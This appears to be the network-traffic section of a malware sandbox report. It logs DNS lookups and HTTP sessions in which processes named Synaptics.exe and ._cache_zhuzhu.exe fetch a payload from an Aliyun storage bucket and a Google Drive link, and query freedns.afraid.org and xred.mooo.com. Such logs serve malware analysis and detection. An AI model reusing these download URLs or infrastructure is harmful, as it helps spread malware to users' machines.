Dec 30, 2024 04:59:57.045190096 CET | 1.1.1.1 | 192.168.2.4 | 0xf509 | No error (0) | shed.dual-low.s-part-0017.t-0009.t-msedge.net | s-part-0017.t-0009.t-msedge.net |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 30, 2024 04:59:57.045190096 CET | 1.1.1.1 | 192.168.2.4 | 0xf509 | No error (0) | s-part-0017.t-0009.t-msedge.net |  | 13.107.246.45 | A (IP address) | IN (0x0001) | false
Dec 30, 2024 05:00:06.404266119 CET | 1.1.1.1 | 192.168.2.4 | 0x5764 | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
                                                                                                                                                                    • bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com
                                                                                                                                                                    • docs.google.com
                                                                                                                                                                    • drive.usercontent.google.com
                                                                                                                                                                    • freedns.afraid.org
                                                                                                                                                                    • s.360.cn
                                                                                                                                                                    • pinst.360.cn
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49743 | 69.42.215.252 | 80 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
Dec 30, 2024 04:59:08.055944920 CET | 154 | OUT | GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1
User-Agent: MyApp
Host: freedns.afraid.org
Cache-Control: no-cache
Dec 30, 2024 04:59:08.668195009 CET | 243 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 30 Dec 2024 03:59:08 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Cache: MISS
Data Raw: 31 66 0d 0a 45 52 52 4f 52 3a 20 43 6f 75 6c 64 20 6e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 2e 0a 0d 0a 30 0d 0a 0d 0a
Data Ascii: 1fERROR: Could not authenticate.0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49774 | 180.163.251.230 | 80 | 7448 | C:\Users\user\Downloads\inst.exe
Timestamp | Bytes transferred | Direction | Data
Dec 30, 2024 04:59:12.712706089 CET | 398 | OUT | GET /safe/instcomp.htm?soft=1000&status=100&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&installed=0&ver=13.0.0.1231&pid= HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: s.360.cn
Connection: Keep-Alive
Dec 30, 2024 04:59:13.583138943 CET | 240 | IN | HTTP/1.1 200 OK
Server: openresty/1.15.8.2
Date: Mon, 30 Dec 2024 03:59:13 GMT
Content-Type: text/html
Content-Length: 0
Last-Modified: Fri, 27 Jul 2018 07:11:48 GMT
Connection: keep-alive
ETag: "5b5ac5b4-0"
Accept-Ranges: bytes
Dec 30, 2024 04:59:14.377734900 CET | 428 | OUT | GET /safe/instcomp.htm?soft=1000&status=127&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&installed=0&parent=Non-existent%20Process&ver=13.0.0.1231&pid= HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: s.360.cn
Connection: Keep-Alive
Dec 30, 2024 04:59:14.685301065 CET | 240 | IN | HTTP/1.1 200 OK
Server: openresty/1.15.8.2
Date: Mon, 30 Dec 2024 03:59:14 GMT
Content-Type: text/html
Content-Length: 0
Last-Modified: Fri, 27 Jul 2018 07:11:48 GMT
Connection: keep-alive
ETag: "5b5ac5b4-0"
Accept-Ranges: bytes
Dec 30, 2024 04:59:15.686605930 CET | 384 | OUT | GET /safe/instcomp.htm?soft=1000&status=1&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&ver=13.0.0.1231&pid= HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: s.360.cn
Connection: Keep-Alive
Dec 30, 2024 04:59:15.994678974 CET | 240 | IN | HTTP/1.1 200 OK
Server: openresty/1.15.8.2
Date: Mon, 30 Dec 2024 03:59:15 GMT
Content-Type: text/html
Content-Length: 0
Last-Modified: Fri, 27 Jul 2018 07:11:48 GMT
Connection: keep-alive
ETag: "5b5ac5b4-0"
Accept-Ranges: bytes
Dec 30, 2024 04:59:15.998871088 CET | 385 | OUT | GET /safe/instcomp.htm?soft=1000&status=12&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&ver=13.0.0.1231&pid= HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: s.360.cn
Connection: Keep-Alive
Dec 30, 2024 04:59:16.307586908 CET | 240 | IN | HTTP/1.1 200 OK
Server: openresty/1.15.8.2
Date: Mon, 30 Dec 2024 03:59:16 GMT
Content-Type: text/html
Content-Length: 0
Last-Modified: Fri, 27 Jul 2018 07:11:48 GMT
Connection: keep-alive
ETag: "5b5ac5b4-0"
Accept-Ranges: bytes
Dec 30, 2024 04:59:17.653928995 CET | 384 | OUT | GET /safe/instcomp.htm?soft=1000&status=8&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&ver=13.0.0.1231&pid= HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: s.360.cn
Connection: Keep-Alive
Dec 30, 2024 04:59:17.961636066 CET | 240 | IN | HTTP/1.1 200 OK
Server: openresty/1.15.8.2
Date: Mon, 30 Dec 2024 03:59:17 GMT
Content-Type: text/html
Content-Length: 0
Last-Modified: Fri, 27 Jul 2018 07:11:48 GMT
Connection: keep-alive
ETag: "5b5ac5b4-0"
Accept-Ranges: bytes
Dec 30, 2024 04:59:19.988972902 CET | 385 | OUT | GET /safe/instcomp.htm?soft=1000&status=10&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&ver=13.0.0.1231&pid= HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: s.360.cn
Connection: Keep-Alive
Dec 30, 2024 04:59:20.296650887 CET | 240 | IN | HTTP/1.1 200 OK
Server: openresty/1.15.8.2
Date: Mon, 30 Dec 2024 03:59:20 GMT
Content-Type: text/html
Content-Length: 0
Last-Modified: Fri, 27 Jul 2018 07:11:48 GMT
Connection: keep-alive
ETag: "5b5ac5b4-0"
Accept-Ranges: bytes
Dec 30, 2024 04:59:20.441509008 CET | 239 | OUT | GET /safe/instcomp.htm?soft=425&status=19&mid=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&ver=13.0.0.1231&vv=10&appkey=&usetime=2282&downrate=0&downlen=0 HTTP/1.1
Host: s.360.cn
Connection: Keep-Alive
Cache-Control: no-cache
Dec 30, 2024 04:59:20.750931978 CET | 240 | IN | HTTP/1.1 200 OK
Server: openresty/1.15.8.2
Date: Mon, 30 Dec 2024 03:59:20 GMT
Content-Type: text/html
Content-Length: 0
Last-Modified: Fri, 27 Jul 2018 07:11:48 GMT
Connection: keep-alive
ETag: "5b5ac5b4-0"
Accept-Ranges: bytes


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    2192.168.2.449793180.163.251.230807448C:\Users\user\Downloads\inst.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Dec 30, 2024 04:59:15.693264961 CET398OUTGET /safe/instcomp.htm?soft=1000&status=109&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&installed=0&ver=13.0.0.1231&pid= HTTP/1.1
                                                                                                                                                                    Accept: */*
                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                    Host: s.360.cn
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Dec 30, 2024 04:59:16.551422119 CET240INHTTP/1.1 200 OK
                                                                                                                                                                    Server: openresty/1.15.8.2
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:16 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    Last-Modified: Fri, 27 Jul 2018 07:11:43 GMT
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    ETag: "5b5ac5af-0"
                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                    Dec 30, 2024 04:59:17.104778051 CET235OUTGET /safe/instcomp.htm?soft=425&status=1&mid=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&ver=13.0.0.1231&vv=10&appkey=&usetime=0&downrate=0&downlen=0 HTTP/1.1
                                                                                                                                                                    Host: s.360.cn
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Dec 30, 2024 04:59:17.408907890 CET240INHTTP/1.1 200 OK
                                                                                                                                                                    Server: openresty/1.15.8.2
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:17 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    Last-Modified: Fri, 27 Jul 2018 07:11:43 GMT
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    ETag: "5b5ac5af-0"
                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                    Dec 30, 2024 04:59:17.648430109 CET398OUTGET /safe/instcomp.htm?soft=1000&status=107&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&installed=0&ver=13.0.0.1231&pid= HTTP/1.1
                                                                                                                                                                    Accept: */*
                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                    Host: s.360.cn
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Dec 30, 2024 04:59:17.952276945 CET  240  IN  HTTP/1.1 200 OK
                                                                                                                                                                    Server: openresty/1.15.8.2
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:17 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    Last-Modified: Fri, 27 Jul 2018 07:11:43 GMT
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    ETag: "5b5ac5af-0"
                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                    Dec 30, 2024 04:59:20.185545921 CET398OUTGET /safe/instcomp.htm?soft=1000&status=129&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&installed=0&ver=13.0.0.1231&pid= HTTP/1.1
                                                                                                                                                                    Accept: */*
                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                    Host: s.360.cn
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Dec 30, 2024 04:59:20.489299059 CET  240  IN  HTTP/1.1 200 OK
                                                                                                                                                                    Server: openresty/1.15.8.2
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:20 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    Last-Modified: Fri, 27 Jul 2018 07:11:43 GMT
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    ETag: "5b5ac5af-0"
                                                                                                                                                                    Accept-Ranges: bytes


                                                                                                                                                                    Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                                                                                                    3           192.168.2.4  49805        39.156.85.231   80                7448  C:\Users\user\Downloads\inst.exe
                                                                                                                                                                    Timestamp  Bytes transferred  Direction  Data
                                                                                                                                                                    Dec 30, 2024 04:59:18.387465000 CET  202  OUT  GET /360safe/h_inst.cab?rd=34183220 HTTP/1.1
                                                                                                                                                                    Accept: */*
                                                                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
                                                                                                                                                                    Host: pinst.360.cn
                                                                                                                                                                    Connection: Close
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Dec 30, 2024 04:59:19.292742968 CET  867  IN  HTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:19 GMT
                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                    Content-Length: 648
                                                                                                                                                                    Last-Modified: Fri, 27 Dec 2024 02:49:36 GMT
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                    Data Raw: 4d 53 43 46 00 00 00 00 88 02 00 00 00 00 00 00 2c 00 00 00 00 00 00 00 03 01 01 00 01 00 00 00 00 00 00 00 46 00 00 00 01 00 01 00 56 03 00 00 00 00 00 00 00 00 9b 59 76 54 20 00 73 65 74 75 70 2e 69 6e 69 00 9c 0c 0f 43 3a 02 56 03 43 4b 65 51 cb 8a 13 41 14 dd 37 f4 3f f8 01 92 dc ba f5 16 6a 51 4f 08 a8 0c 33 8c 9b 41 42 27 69 33 c1 4e 3a 74 f7 30 2e f2 47 6e 44 c1 95 a0 4b 15 11 bf c5 bd 60 f5 30 19 67 b0 0b 8a 7b aa cf bd 55 e7 9c 0b 2a 60 b6 eb 87 aa 69 ea ee 65 59 9c 35 9b 55 7d 76 d9 5e 9f d6 7d 7b d5 2d eb f3 d3 a7 e6 72 18 f6 4f a6 d3 55 7b bd 9b 64 7e 5f bd aa 27 cb 76 3b bd ad a7 fd d8 d4 e7 a6 f9 ae be 9e 2c ab 45 59 a4 ae dd 9a cb f9 26 8f 2e 8b 93 ae 5d 5d 2d 07 93 f9 67 99 5f 16 65 71 71 5b e7 2b 9f 57 db 7a fc f5 ee fd d7 b7 3f bf 7c ff 9c f9 9b d5 5d 6f 9a 05 d3 d7 c3 d5 7e 4e e8 04 f2 42 00 f5 ba 2c 5e d4 5d bf 69 77 e6 df a9 2e 8b d3 7a 7d 7b 9e 36 cd cd d0 0c 27 ab a6 29 8b 59 ef ea a1 32 50 16 e7 5d d3 9b fd 28 26 6b 5a a0 21 00 80 32 6f 87 3d 1a 07 96 20 07 e9 79 92 c9 21 06 [TRUNCATED]
                                                                                                                                                                    Data Ascii: MSCF,FVYvT setup.iniC:VCKeQA7?jQO3AB'i3N:t0.GnDK`0g{U*`ieY5U}v^}{-rOU{d~_'v;,EY&.]]-g_eqq[+Wz?|]o~NB,^]iw.z}{6')Y2P](&kZ!2o= y!ItPHTLK]<E|?>BgoMud1B#P'3NG]y4gj}c9wGAz*8F/s:4U\Z1{O"Io(0P:BJ<::x$*#NF<F`ErL 9KS r5-b"h~[1dIaiasAzWY-Hq<`0@J


                                                                                                                                                                    Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                                                                                                    4           192.168.2.4  49806        39.156.85.200   80                7448  C:\Users\user\Downloads\inst.exe
                                                                                                                                                                    Timestamp  Bytes transferred  Direction  Data
                                                                                                                                                                    Dec 30, 2024 04:59:19.331927061 CET  202  OUT  GET /360safe/h_inst.cab?rd=34183220 HTTP/1.1
                                                                                                                                                                    Accept: */*
                                                                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
                                                                                                                                                                    Host: pinst.360.cn
                                                                                                                                                                    Connection: Close
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Dec 30, 2024 04:59:19.660701036 CET  228  IN  HTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.2.6.10
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:19 GMT
                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                    Content-Length: 648
                                                                                                                                                                    Last-Modified: Fri, 27 Dec 2024 02:49:32 GMT
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                    Dec 30, 2024 04:59:19.660826921 CET648INData Raw: 4d 53 43 46 00 00 00 00 88 02 00 00 00 00 00 00 2c 00 00 00 00 00 00 00 03 01 01 00 01 00 00 00 00 00 00 00 46 00 00 00 01 00 01 00 56 03 00 00 00 00 00 00 00 00 9b 59 76 54 20 00 73 65 74 75 70 2e 69 6e 69 00 9c 0c 0f 43 3a 02 56 03 43 4b 65 51
                                                                                                                                                                    Data Ascii: MSCF,FVYvT setup.iniC:VCKeQA7?jQO3AB'i3N:t0.GnDK`0g{U*`ieY5U}v^}{-rOU{d~_'v;,EY&.]]-g_eqq[+W


                                                                                                                                                                    Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                                                                                                    0           192.168.2.4  49732        47.79.48.211    443               3624  C:\Users\user\Desktop\._cache_zhuzhu.exe
                                                                                                                                                                    Timestamp  Bytes transferred  Direction  Data
                                                                                                                                                                    2024-12-30 03:59:03 UTC  132  OUT  GET /inst.exe HTTP/1.1
                                                                                                                                                                    User-Agent: URLDownloader
                                                                                                                                                                    Host: bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    2024-12-30 03:59:03 UTC  563  IN  HTTP/1.1 200 OK
                                                                                                                                                                    Server: AliyunOSS
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:03 GMT
                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                    Content-Length: 4118496
                                                                                                                                                                    Connection: close
                                                                                                                                                                    x-oss-request-id: 67721A877CC7753934B1EB98
                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                    ETag: "AAA0F14BDFE3777EEE342C27DE409E6D"
                                                                                                                                                                    Last-Modified: Sat, 28 Dec 2024 06:31:15 GMT
                                                                                                                                                                    x-oss-object-type: Normal
                                                                                                                                                                    x-oss-hash-crc64ecma: 13828654626470641508
                                                                                                                                                                    x-oss-storage-class: Standard
                                                                                                                                                                    x-oss-ec: 0048-00000113
                                                                                                                                                                    Content-Disposition: attachment
                                                                                                                                                                    x-oss-force-download: true
                                                                                                                                                                    Content-MD5: qqDxS9/jd37uNCwn3kCebQ==
                                                                                                                                                                    x-oss-server-time: 34


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49739 | 142.250.181.238 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 03:59:07 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
2024-12-30 03:59:08 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:08 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-ExyB9bjuO92GdfrlgJ75OA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49738 | 142.250.181.238 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 03:59:07 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
2024-12-30 03:59:08 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:07 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce--LEOwFsMCcjLPnxLcgdHpg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49744 | 142.250.181.238 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 03:59:08 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
2024-12-30 03:59:09 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:08 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-ZE_MQgg3s6yc8tJNQoSzpQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49746 | 142.250.181.238 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 03:59:08 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
2024-12-30 03:59:09 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:09 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-vxcstN03jBnPRmOW02ipaQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
